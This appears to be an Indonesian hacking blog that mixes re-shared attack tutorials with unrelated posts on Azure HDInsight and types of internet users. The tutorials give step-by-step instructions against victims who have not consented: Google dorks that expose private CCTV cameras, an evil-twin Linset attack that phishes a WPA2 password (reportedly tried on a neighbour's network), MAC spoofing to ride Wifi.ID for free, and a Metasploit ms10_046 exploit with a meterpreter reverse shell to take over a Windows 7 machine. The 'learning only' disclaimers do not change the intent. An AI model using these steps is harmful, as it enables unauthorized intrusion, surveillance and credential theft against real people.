Cara "Ngusilin" Kamera CCTV


Langsung saja, tutorial ini di buat oleh teman facebook saya, dan saya berusaha re-share saja. Sumber tutorial ini berasal dari sini.

OKe, langsung aja yaa.

Pernah lihat Kamera CCTV yang ada di Jalan-jalan kan? pernah berfikir untuk "bermain" dengan kamera itu? jika iyaa, tutorial ini sangat berguna buat kamu. Seperti biasa, tutorial ini hanya di tujukan untuk pembelajaran saja, tidak untuk tindak kriminal, got it?

1. Buka Browser kamu, terserah mau pakai Safari, Opera, Firefox atau crhome yang penting harus sudah terinstall flash player.

2. Masuk ke Google

3. Pilih salah satu dork dibawah ini:

intitle:”Live View / – AXIS”
inurl:indexFrame.shtml Axis
inurl:”ViewerFrame?Mode=”
intitle:snc-rz30
inurl:home/ inurl:/view/index.shtml
inurl:”ViewerFrame?Mode=”
inurl:netw_tcp.shtml
intitle:”supervisioncam protocol”
inurl:CgiStart?page=Single
inurl:indexFrame.shtml?newstyle=Quad
intitle:liveapplet inurl:LvAppl
inurl:/showcam.php?camid inurl:video.cgi?resolution=
inurl:image?cachebust=
inurl:view/view.shtml
intext:”MOBOTIX M1?
intext:”Open Menu”
intitle:snc-rz30 inurl:home/
inurl:”MultiCameraFrame?Mode=”
intitle:”EvoCam”
inurl:”webcam.html”
intitle:”Live NetSnap Cam-Server feed”
intitle:”Live View / – AXIS 206M”
intitle:”Live View / – AXIS 206W”
intitle:”Live View / – AXIS 210?
inurl:indexFrame.shtml Axis
inurl:”ViewerFrame?Mode=”
inurl:”MultiCameraFrame?Mode=Motion”
intitle:start
inurl:cgistart
intitle:”WJ-NT104 Main Page”
intext:”MOBOTIX M1?
intext:”Open Menu”
intext:”MOBOTIX M10?
intext:”Open Menu”
intext:”MOBOTIX D10?
intext:”Open Menu”
intitle:snc-z20
inurl:home/
intitle:snc-cs3
inurl:home/
intitle:snc-rz30
inurl:home/
intitle:”sony network camera snc-p1?
intitle:”sony network camera snc-m1?
site:.viewnetcam.com -www.viewnetcam.com
intitle:”Toshiba Network Camera” user login intitle:”netcam live image”
intitle:”i-Catcher Console – Web Monitor”
inurl:/home/home “Kamerainformationen anzeigen”
intitle:”AXIS 2100 Network Camera Axis 2100 Network Camera 2.02?
intitle:”Linksys Web Camera” “ver”
inurl:”/view/index.shtml”
intitle:liveapplet
inurl:lvappl
cgi-bin/video.jpg?size=2
inurl:ViewerFrame?Mode=
inurl:ViewerFrame?Mode=Refresh
inurl:axis-cgi/jpg
inurl:axis-cgi/mjpg (motion-JPEG)
inurl:view/indexFrame.shtml
inurl:view/index.shtml
inurl:view/view.shtml
liveapplet
intitle:”live view” intitle:axis
intitle:liveapplet
allintitle:”Network Camera NetworkCamera”
intitle:axis intitle:”video server”
intitle:liveapplet inurl:LvAppl
intitle:”EvoCam” inurl:”webcam.html”

4. lalu pilih salah satu yang di tampilkan google, akan muncul gambar.

5. Kalau kamu beruntung, kamu bisa nemu kamera yang bisa di kendalikan, diubah arahnya, dll. Perlu di ketahui, kamera ini bersifat Real-Time, jadi yang kita lihat yaa saat itu juga. Bisa kamu manfaatkan untuk melihat trafik lalu lintas.

Sekali lagi, tutorial ini hanya untuk pembelajaran semata.

Microsoft Memilih Linux Ubuntu Sebagai Server Cloud Azure HDInsight Mereka


Baru-baru ini Microsoft mengumumkan jika mereka membuat Linux mereka sendiri.

Dan sekarang Microsoft mengumumkan kalau mereka menggunakan Linux Ubuntu sebagai Cloud Server.

Untuk membuat Azure Data Lake Project yang akan membuat pemrosesan data besar (Cloud) menjadi lebih simple dan mudah di akses, Microsoft telah bekerja sama dengan Hortonworks dan Canonical untuk merilis Azure HDInsights, untuk pengguna Linux.

Apa itu Azure HDInsight?

Azure HDInsight adalah program yang di disain untuk mengendalikan data dalam jumlah besar, dalam cangkupan Terabytes ke Petabytes. Untuk pengguna Linux, kamu bisa mengatur Azure HDInsights menggunakan aplikasi Apache Ambari

Dengan rilis baru, Azure HDInsight memiliki kemampuan tambahan:
  • Skala Cluster
  • Dukungan Tindakan Script
  • Virtual Intergrasi Jaringan
Dan Azure HDInsight juga memiliki dua Versi yaitu:

Azure data Lake Store: Menyediakan repositori tunggal untuk menangkap dengan mudah data ukuran, jenis atau kecepatan tanpa memaksa perubahan aplikasi mereka sebagai skala data.
 

Azure data Lake Analytics: Sebuah layanan yang dibangun di atas Apache Benang yang dinamis skala lingkungan pelanggan berdasarkan kebutuhan.


Masih ingat, dulu Microsoft pernah bilang tidak mau menggunakan Linux?

Menemukan Password WiFi WPA2/PSK dengan Linset, tanpa WordList 100% Berhasil Jika Beruntung

Hello gaan, kali ini saya akan share tutorial tentang 'mainan' dengan Wifi, hehe.. tutorial ini saya hanya re-share, bukan buatan saya tapi teman saya >> right here.

katanya sih, doi udah ngetes di wifi tetangga dan berhasil, makanya ane share aja deh disini:
langsung saja yaa, 
oiyaa, ini hanya pembelajaran semata, adapun selebihnya bukan tanggung jawab kami!
 
1. Open your Linset
Buka linset kamu, secara default Linset udah keinstall di Kali Linux, tapi jika kamu pakai distro selain kali linux, bisa download dulu >> download it in here. then Install it!

jika berada di folder home >> cd /linset-master/
                               chmod +x ./linset


jika berada di folder download >> cd /downloads/linset-master
                                     chmod +x ./linset




2. Ikutin gambar aja gan

3. Sama, ikutin gambar ajah


4. nah , sekarang linset sedang mencari wifi yang di password, kalau sudah nemu targetnya, tekan CTRL+C aja


5. kalau kamu sudah dapat target, bakal seperti ini nantinya:



6. pilih target mu, disini target saya nomer 2




7. just enter it



8. pilih aircrack (number 1)



9. pilih, capture handshake dan nomer 1



10. wait 'till handshake has captured, then you can close it



11.  jika udah selesai, klik nomer 1, secara teknis korban nggak bisa login di wifi dia, mau nggak mau dia login di wifi kita, nah disinilah passwordnya nanti kita dapatkan



12. pilih nomer 1 untuk membuat login page palsu



13. choose your language.



14. then, tunggu samai korban membuka wifinya, nanti passwordnya bakal kerekam disini




15. kalau udah dapat, restart linux kamu, karena linset secara default mematkan configurasi mu, jadi kamu perlu restart dulu.




Nah, kalau abis restart icon wifinya ilang, kamu harus ketik ini di terminal:

service network-manager restart

thanks for reading, this is from my blogger friends:
REXTOR HAXOR. Source: http://rextor404.blogspot.co.id/2015/03/cara-hack-wifi-wpa2psk-tanpa-wordlist.html

Cara Menggunakan @Wifi.ID Gratis dengan KALI Linux Tanpa Username/Akun Terbaru

Oke gan, perlu di ketahui, ini adalah tutorial bukan buatan saya, saya hanya re-share, sumber akan saya cantumkan di bawah, karena memang tujuan saya untuk share ulang.

pertama, seperti biasa, ini hanyalah pembelajaran semata, selebihnya bukan tanggung jawab saya, saya hanya re-share untuk kepentingan belajar, Got it?

oke, langsung saja.
 

1.buka terminal kamu, lalu ketik: 

airmon-ng  >> untuk melihat interface kamu, disini interface saya adalah wlan0


2. lalu ketik airmon-ng start wlan0



3. lalu ketik airodump-ng mon0 ini di lakukan untuk melihat IP dan Mac Address korban yang sudah terkoneksi dengan wifi id.




berikut tampilan Mac Address korban, jika sudah. Copy kan Mac Address Korban ke Mac Changer kamu, agar Mac Address kamu berubah jadi seperti punya korban, dengan kata lain. Kamu menyamar. Carilah Frame tertinggi.


4. ketik ctrl+c bersamaan, lalu kita mulai nge-cloning mac address kita:


airmon-ng stop mon0
ifconfig wlan0 down
macchanger -m (maccadresskorban) wlan0
ifconfig wlan0 up



5. sambungkan ke wifi.id, selamat!












 

SUMBER : www.rextor404.blogspot.co.id/2015/03/cara-hack-wifi-id-menggunakan-kali-linux.html

Finding Wifi Password WPA2/PSK Without Word List Using Linset

Hello, so today I will show you how to "finding" wifi password without word list. I found this tutorial from my blogger friends, right here. I just re-share this tutorial in english, because the original tutorial is Indonesian.

So, he has tested this tutorial with his neighbors wifi, then he said its work correctly, so I will re share this tutorial for you.

1. Open your Linset
Ok, Open your linset, Linset has installed by default on your Kali Linux. But, if you dont have it, just download it in here. then run it

if in home folder >> cd /linset-master/
                               chmod +x ./linset


if in download folder >> cd /downloads/linset-master
                                     chmod +x ./linset


2. follow this picture

3. just follow this picture


4. in this part, linset looking for protected wifi. if done, just hit ctrl+c


5. if got a target, it will be like this



6. choose your target by number, in this case I have target in number 2




7. just enter it



8. choose aircrack (number 1)



9. choose number 1, capture handshake



10. wait 'till handshake has captured, then you can close it



11. if you finish, choose number 1. Technically, victim cant login at their wifi, so they will login in our fake wifi



12. choose number 1 to create our fake login page.



13. choose your language.



14. then, like a tom waiting for jerry into his trap. We just sit and watch until the victim into our trap. then the password will show.




15. in this part, we have victims wifi password. If you wanna use it, you have to restart your PC, because linset automatically turned off your network manager.


if after use linset your wifi icon is lost, type this command in terminal:

service network-manager restart

thanks for reading, this is from my blogger friends:
REXTOR HAXOR. Source: http://rextor404.blogspot.co.id/2015/03/cara-hack-wifi-wpa2psk-tanpa-wordlist.html

Bedakan Antara Pengguna Komputer di Bawah ini

Dunia cyber sudah menjadi dunia ke 3 bagi kehidupan manusia. Di dunia cyber (atau maya) banyak sekali orang-orang yang "cerdas" disana.

tetapi, karena banyaknya itu, kita harus bisa membedakan mana orang yang benar-benar cerdas dan mana orang yang hanya ikut-ikutan. Di dunia maya banyak ada istilah Darknet atau bisa juga di sebut forum rahasia. disana terdapat banyak sekali orang pintar dari yang baru belajar sampai yang sudah master.

Namun, banyak juga pengguna dunia maya yang hanya menggunakan untuk kesenangan, contohnya gamer, otaku dan lain-lain. Mereka tidak salah, mereka hanya mengikuti passion dirinya, dan itu bagus. Kebanyakan orang umum menanggap, seoarang pengguna dunia maya itu semua sama, nyatanya tidak. mari kita bahas:



1. OTAKU

Pengguna internet satu ini, biasanya menggunakan internet untuk berburu hobi mereka, yaitu memburu anime-anime terbaru, biasanya otaku memiliki koleksi anime yang sangat banyak, dari yang terkenal sampai yang belum terkenal pun mereka ada. Dari game, musik, film, laptop semuanya berbau anime.


2. Gamer

Gamer adalah player, alias pemain dari game. Pengguna satu ini, biasanya menggunakan internet, untuk berburu game, mencari game terbaru, hunting diskon game, mencari review game, dll. gamer biasanya memiliki komputer yang lebih hebat dari pengguna komputer lainya, ini karena game-game saat ini membutuhkan tingkat grafis yan semakin tinggi, mayoritas gamer adalah golongan med-high. Mereka menyebut diri mereka gamer karena sudah banyak memainkan game dari kelas teri sampai kelas kakap, sejenis. CoD, Battlefield, DayZ, dll.


3. User Biasa

Pengguna biasa. hanyalah seorang pengguna yang menggunakan internet untuk mengisi waktu luang saja, biasanya hanya untuk facebook-an, twitteran dll. mereka kadang lebih pakar dalam bidang sosmed ketimbang pengguna lain, tetapi jika ada masalah di sosmed pengguna biasa ini, bakal kelabakan. biasanya.


4. Geek

Geek, adalah pengguna internet yang 'lebih' dari pengguna lain, biasanya mereka jago dan lebih handal. Karena geek pengguna yang memiliki satu passion. Jika geek smartphone,maka dia akan lebih jago menggunakan smarthpone nya, begitu juga yang lain.


5. Anak Sekolah

Anak sekolahan biasanya menggunakan komputer atau internet hanya untuk mencari tugas sekolahnya saja, mereka menggunakan internet seperlunya, jika memang di perlukan saja. Tapi tidak sedikit pula anak sekolahan yang sedikit menyeleweng ke arah Geek, mereka lebih aktif di internet dari pada pelajaran.


6. Ibu-Ibu

Menggunakan internet hanya untuk mencari masakan, gosip, hubungan keluarga dll.  tapi banyak juga ibu-ibu yang menggunakan internet untuk hal lain.


Mungkin itu saja yang bisa saya jelaskan, kalau kamu punya argumen lain silakan tulis di komentar.

Cara Masuk ke Windows 7 Secara Paksa Dengan Metasploit (Penetrations Testing) dengan KALI Linux

Sekilas tentang Metasploit

Metasploit adalah suatu software yang di gunakan untuk menguji ketahanan suatau sistem dengan menggunakan kelemahan sistem tersebut. Metasploit diciptakan oleh HD Moore pada tahun 2003 sebagai sebuah alat jaringan portabel menggunakan bahasa scripting Perl.

Kemudian, Metasploit Framework benar-benar ditulis ulang dalam bahasa pemrograman Ruby. Pada tanggal 21 Oktober 2009, Proyek Metasploit mengumumkan yang telah diakuisisi oleh Rapid7, sebuah perusahaan keamanan yang menyediakan solusi kerentanan manajemen terpadu.

Metasploit biasanya digunakan untuk menyerang application layer dengan 0 day attack (sekali penyerarngan (dalam beberapa kasus ada yang berkali-kali) yang merupakan metode penyerangan pada software yang belum di patch.

Metasploit biasa dikaitkan dengan istilah remote exploitation, maksudnya penyerang berada pada jarak jangkauan yang jauh dapat mengendalikan komputer korban. Metasploit menyerang dengan cara mengirimkan exploit pada komputer korban. Exploit ini berisi payload yang sudah ditentukan oleh penyerang.

Cukup perkenalan dengan Metasploit, sekarang kita belajar menggunakan Metasploit itu sendiri.

Secara Default Metasploit sudah terinstall di KALI Linux OS, tapi untuk OS selain kali linux, semisal ubuntu kita harus instal manual. Jadi langkah pertama yang harus kita lakukan adalah Download dan Install Metasploit Framework. Namun tata cara penggunaan tetap sama.

Download dan Install Metasploit Framework

Download Metasploit Framework disini  setelah selesai, Ubuntu secara default akan menyimpan hasil download pada folder Download. Jadi lakukan perintah ini:
cd Downloads
sudo chmod +x (nama metasploit).run
sudo ./(nama metasploit).run
Setelah itu akan muncul tampilan GUI, tinggal klik next dan next saja.

Oke, sampai disini saya asumsikan kalian sudah menginstall metasploit dan berhasil. jika belum, silakan tanyakan di komentar.

Here we go!

*jika gambar kurang jelas, Klik saja untuk memperbesar

1. Buka Metasploit
Untuk KALI Linux cara membukanya seperti ini, lakukan di terminal:
msfconsole
dan untuk Ubuntu/selain Kali Linux
sudo msfconsole

2. Cari LNK
Ketik "search LNK"

3. Ikut Gambar
Setelah keluar hasil, maka ketik use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

4. set SRVHOST dan LHOST
Pada tahap ini, kita setting LHOST dan SRVHOST, ikuti gambar.
ketik ifconfig lalu sesuaikan. Ini adalah IP saya
192.168.1.107 menggunakan wifi jadi wlan0
kalau kabel eth0

Kemudian, setelah di lihat IP kita, kita set ke LHOST dan SRVHOST nya:
set SRVHOST (IP KAMU)
set LHOST (IP KAMU)
show options

Maka hasilnya seperti ini

5. set payload
ketik "set PAYLOAD windows/meterpreter/reverse_tcp" Tanpa tanda petik

6. Cek, apakah berhasil?
ketik "show options" , jika hasilnya seperti ini, maka berhasil:



7. Mulai Exploit
Ayo, kita mulai exploitnya dengan cara ketik "exploit" di terminal


Selesai Pembuatan Exploit, sekarang gunakan teknik Social Engginering kalian.

Pada tahap ini, kita sudah selesai membuat exploit untuk korban, langkah selanjutnya adalah membuat korban masuk ke jebakan exploit kita. Lagi-lagi teknik Soceng, alias Social Engineering di gunakan disini, cari cara sendiri, saya disini hanya berbagi cara orang jahat nge-anu korban dan hanya pembelajaran.

Oke, kita cek yuk... jika korban sudah membuka exploit kita.

Exploit kalian adalah IP Kalian
Perhatikan ketika saya membuka IP saya di Internet Explorer Milik Windows.



Setelah terminal kamu jadi seperti di atas, alias ada tulisan "Meterpreter session 1 opened blablabla" , tandanya sudah ada korban yang terjebak. Mari Kita eksekusi, oke, sekarang tekan CTRL+C

Eksekusi Korban
ketik
sessions -l
jika tampilan sudah seperti di atas, artinya sudah ada yang terbuka. Ayo kita lanjutkan, ketik
sessions -i 1
cek lagi yuk, sudah masuk atau belum ketik "sysinfo"


horeee, kita sudah masuk, ayoo lanjut eksekusi, kita masuk ke komputer korban, maksud saya "benar-benar" masuk.
ketik "shell" tanpa tanda petik.

kita sudah benar-benar masuk ke komputer korban, sampai tahap ini. Kita menggunakan perintah dasar windows (cmd) bukan menggunakan perintah linux lagi.

Sekarang kita sudah menguasai Komputer korban, kita bisa hapus, copy (download), copy (upload), menanam program jahat, uninstall aplikasi, dan masih banyak lagi.


(i) ini hanya sekedar pembelajaran, diluar itu, saya tidak bertanggung jawab.